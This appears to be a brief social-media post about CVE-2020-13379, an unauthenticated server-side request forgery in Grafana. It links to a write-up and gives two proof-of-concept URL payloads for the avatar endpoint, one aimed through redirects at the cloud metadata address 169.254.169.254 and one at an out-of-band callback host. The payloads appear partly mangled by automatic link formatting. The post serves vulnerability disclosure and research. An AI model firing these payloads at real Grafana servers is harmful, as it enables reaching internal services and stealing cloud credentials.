■■■■□ CVE-2020-13379: Unauthenticated SSRF in Grafana
https://rhynorater.github.io/CVE-2020-13379-Write-Up
PoC 1: avatar/tesdt%3Fd=http://redirect.rhynorater.com%25253f%253b%http://252fbp.blogspot.com%252f169.254.169.254
PoC 2:
avatar/0%3fd%3dhttps%3A%252F%252F${BURPCOL}%25253A443%25253f%http://252Fimgur.com%252F
By: via cKure ✪